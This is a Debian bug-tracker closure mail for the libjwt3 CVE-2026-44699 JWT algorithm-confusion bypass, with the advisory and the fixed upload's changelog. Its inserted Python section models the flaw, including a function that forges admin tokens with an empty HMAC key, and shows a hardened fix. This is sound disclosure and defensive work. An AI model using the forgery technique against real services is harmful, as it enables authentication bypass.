Your message dated Tue, 19 May 2026 10:05:16 +0200
with message-id <[email protected]>
and subject line Re: Accepted libjwt3 3.3.3-1 (source) into unstable
has caused the Debian Bug report #1136810,
regarding libjwt3: CVE-2026-44699
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
1136810: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1136810
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Source: libjwt3
Version: 3.3.2-1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: [email protected], Debian Security Team <[email protected]>

Hi,

The following vulnerability was published for libjwt3.

CVE-2026-44699[0]:
| LibJWT is a C JSON Web Token Library. From 3.0.0 to 3.3.2, libjwt
| accepts an RSA JWK that does not contain an alg parameter as the
| verification key for an HS256/HS384/HS512 token. In the OpenSSL
| backend, this causes HMAC verification to run with a zero-length
| key, so an attacker can forge a valid JWT without knowing any secret
| or RSA private key. This is an algorithm-confusion authentication
| bypass. It affects applications that load RSA keys from JWKS where
| alg is omitted, which is valid JWK syntax and common in real
| deployments, and then choose the verification algorithm from the JWT
| header, for example in a kid lookup callback. This vulnerability is
| fixed in 3.3.3.


If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2026-44699
    https://www.cve.org/CVERecord?id=CVE-2026-44699
[1] https://github.com/benmcollins/libjwt/security/advisories/GHSA-q843-6q5f-w55g
[2] https://github.com/benmcollins/libjwt/commit/49c730a4036c5ae67a4a97e4e55101e445fda694

Regards,
Salvatore

--- End Message ---
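The report above describes the bug in prose only. What follows is an added example, written for this page and not taken from libjwt or from the report: a small Python model of the failure mode the CVE text describes (kid lookup returns an RSA JWK with no "alg", the verification algorithm is taken from the attacker-controlled JWT header, and the HMAC verifier ends up with a zero-length key) next to a hardened key resolution that binds the JWK type to the algorithm family and refuses an empty secret. It does not reproduce libjwt's C API or its OpenSSL backend; the JWKS, the kid values rsa-2026 and hs-2026, the claims and every function name are constructed for the demonstration, and the RSA "n"/"e" members are dummy bytes, not a real key.

```python
"""Model of the CVE-2026-44699 algorithm-confusion bypass.

Added example, not libjwt code: reproduces in plain Python the behaviour
the advisory text describes so the flaw and the fix can be run side by side.
JWKS content, kids and claims are constructed; the RSA members are dummies.
"""
import base64
import hashlib
import hmac
import json

HS_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


# Constructed JWKS. The RSA entry omits "alg" (valid JWK syntax, the case the
# advisory calls out). The oct entry is a legitimate HMAC key for comparison.
HMAC_SECRET = b"constructed-demo-secret-not-for-production"
JWKS = {
    "keys": [
        {"kty": "RSA", "kid": "rsa-2026", "use": "sig",
         "n": b64url_encode(bytes(range(1, 33))), "e": "AQAB"},  # dummy values
        {"kty": "oct", "kid": "hs-2026", "k": b64url_encode(HMAC_SECRET)},
    ]
}


def lookup_by_kid(jwks: dict, kid: str) -> dict:
    """The kid-lookup callback the advisory describes: select a JWK by kid only."""
    for jwk in jwks["keys"]:
        if jwk.get("kid") == kid:
            return jwk
    raise KeyError(kid)


def sign_hs(key: bytes, alg: str, kid: str, claims: dict) -> str:
    """Produce an HS* JWT. With key=b"" this is exactly the attacker's forgery."""
    sep = {"separators": (",", ":")}
    header_b64 = b64url_encode(json.dumps({"alg": alg, "typ": "JWT", "kid": kid}, **sep).encode())
    payload_b64 = b64url_encode(json.dumps(claims, **sep).encode())
    mac = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), HS_ALGS[alg]).digest()
    return f"{header_b64}.{payload_b64}.{b64url_encode(mac)}"


def _check_hs(key: bytes, alg: str, header_b64: str, payload_b64: str, sig_b64: str) -> bool:
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), HS_ALGS[alg]).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def verify_vulnerable(token: str, jwks: dict) -> bool:
    """Models the 3.0.0 to 3.3.2 behaviour: alg is trusted from the header, the
    JWK is whatever kid resolves to, and a JWK with no "k" yields an empty key."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    jwk = lookup_by_kid(jwks, header["kid"])
    alg = header["alg"]
    if alg not in HS_ALGS:
        raise ValueError("only HS* is modelled here")
    key = b64url_decode(jwk.get("k", ""))  # RSA JWK has no "k": zero-length key
    return _check_hs(key, alg, header_b64, payload_b64, sig_b64)


def resolve_hmac_key(jwk: dict, alg: str) -> bytes:
    """Hardened resolution: bind key type to the algorithm family, honour a JWK
    alg when one is present, and never run HMAC with an empty secret."""
    if alg not in HS_ALGS:
        raise ValueError(f"unsupported alg {alg!r}")
    if jwk.get("kty") != "oct":
        raise ValueError(f"{alg} needs an oct JWK, got kty={jwk.get('kty')!r}")
    if "alg" in jwk and jwk["alg"] != alg:
        raise ValueError("JWK alg does not match token header alg")
    key = b64url_decode(jwk.get("k", ""))
    if not key:
        raise ValueError("empty HMAC key")
    return key


def verify_hardened(token: str, jwks: dict) -> bool:
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    jwk = lookup_by_kid(jwks, header["kid"])
    key = resolve_hmac_key(jwk, header["alg"])
    return _check_hs(key, header["alg"], header_b64, payload_b64, sig_b64)


def forged_token(alg: str = "HS256") -> str:
    """Attacker side: no secret and no RSA private key, only the public kid."""
    return sign_hs(b"", alg, "rsa-2026", {"sub": "admin", "role": "root"})


if __name__ == "__main__":
    t = forged_token()
    print("vulnerable verifier accepts forgery:", verify_vulnerable(t, JWKS))
    try:
        verify_hardened(t, JWKS)
    except ValueError as exc:
        print("hardened verifier rejects forgery:", exc)
```

The point of the hardened path is that the check must hang on "kty", not on "alg": the advisory notes that omitting "alg" from a JWK is valid and common, so a resolver that only compares the JWK's alg with the header's alg when both are present still passes the RSA key straight into HMAC. Refusing an empty key is a second, independent guard for the OpenSSL-style backend behaviour the report describes.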
--- Begin Message ---
Source: libjwt3
Source-Version: 3.3.3-1

On Mon, May 18, 2026 at 09:48:46PM +0000, Debian FTP Masters wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
> 
> Format: 1.8
> Date: Mon, 04 May 2026 10:13:19 -0400
> Source: libjwt3
> Architecture: source
> Version: 3.3.3-1
> Distribution: unstable
> Urgency: medium
> Maintainer: Benjamin Collins <[email protected]>
> Changed-By: Benjamin Collins <[email protected]>
> Changes:
>  libjwt3 (3.3.3-1) unstable; urgency=medium
>  .
>    [Benjamin Collins]
>    * New upstream release
>    * Security advisory: GHSA-q843-6q5f-w55g
>      - Algorithm confusion allows JWT forgery with RSA JWK as empty-key HMAC
>      - Fixes: CVE-2026-44699
>    [Nicolas Mora <[email protected]>]
>    * Update Standards-Version to 4.7.4
>    * Remove debian/libjwt14-doc.lintian-overrides
>    * Remove Priority and Rules-Requires-Root in d/control which are useless
>      in 4.7.4
> Checksums-Sha1:
>  b10b7932a078a0253ce885f318cbbc60ae0f3031 2253 libjwt3_3.3.3-1.dsc
>  aa0c6270bba75e13d8e8a12f46a9d3d4ea45894c 606701 libjwt3_3.3.3.orig.tar.gz
>  f6e66121e3548e55dc9b43c36545f5406303da5b 5500 libjwt3_3.3.3-1.debian.tar.xz
>  31292d0321ea31e848bc1055ac1ce1d5fbbccd95 11341 libjwt3_3.3.3-1_amd64.buildinfo
> Checksums-Sha256:
>  d5ff99a33f07c4cc8033ec2c29679e3238f6b9dde6ebcb230ea335fa7b65f58c 2253 libjwt3_3.3.3-1.dsc
>  a562e5548a8e10ac6fcba64a5e6d326c15712211cb54d25242c15e8b3250b4f2 606701 libjwt3_3.3.3.orig.tar.gz
>  b69e2fa569b6213164f692e01968b96e0c2d6a67e1f51fba3e56eaebf3e7f021 5500 libjwt3_3.3.3-1.debian.tar.xz
>  1afb1c737f1b225afb158b4b26d8438b1418c6247ed74947e7f3ca221bc1a859 11341 libjwt3_3.3.3-1_amd64.buildinfo
> Files:
>  236e0777800cb1fad71f73cb57cfc739 2253 devel optional libjwt3_3.3.3-1.dsc
>  ad40f0b2f073ab84b43784873849f70e 606701 devel optional libjwt3_3.3.3.orig.tar.gz
>  7a90757b18f9d2528851b0ff41b01326 5500 devel optional libjwt3_3.3.3-1.debian.tar.xz
>  a3a747213b0378527cb08b6839279c32 11341 devel optional libjwt3_3.3.3-1_amd64.buildinfo
> 
> -----BEGIN PGP SIGNATURE-----
> 
> iQIzBAEBCgAdFiEEhAWwL8wo75dEyPJT/oITlEC9IrkFAmoLhpkACgkQ/oITlEC9
> IrkKFw//dxuww6+gykrJNFi7jgPOWSbHl9gpyIjXvoC3fP6cmDTh1D7wA6flZ8+0
> BNz8AwSepsO6SHCvJ1d+E1wpyXrzDKJ5qwmcgETl0Jjzol1FcLSFLsTo/bgCbw9x
> bBU83FYvY7s9tT4U1K13GI5Zy3OKYLelnJng9T7lxMySWYvhJAqnbf9H4YKVXO5G
> YTTOkEXI2oEG5dbVllPagaV4bmgQZZ040sBycGUiC81pWEadXdx3z01cRLgq3Lbs
> EVfwBtzGqyMR+A63JRPnD1v7es82P+BSyOT/CS10DjRoxzQOzvVLpA4BWmaWS/wv
> CdtSSK0QSdnnKJ1CvyZpp6b8vS2RxvWj3svG3o3swQMWAah/TENV5GfkXTNY2/YQ
> GOgqaBPtPND3PFvOhpo5BeG3HSgTG+jAQHHJKWPe7IqFMk7o2DsKth7UlhaCdgtC
> pfVlSNjmeczPvOBSN+90KeeWOBfEXBMMf+pVcTNvXhaBdPY+aGRk3pkgNdxcRrQZ
> aq7aZEW22W9w4NVFCO7J994b+E9CCzCxiQyJQrna2b8stw3SNYMFc+yxr9uslAfe
> WFnrbd7mttZAbg8/OBlGiOmq5gi/8Tp/b6yUw8zFhW/K/QZs4YHLllBUh0c1yMp1
> njy9VKEit/v5CeRR9S9MPC3cI0M6wadT8+r0+/TRY+8jOLteJvo=
> =lZX9
> -----END PGP SIGNATURE-----

--- End Message ---
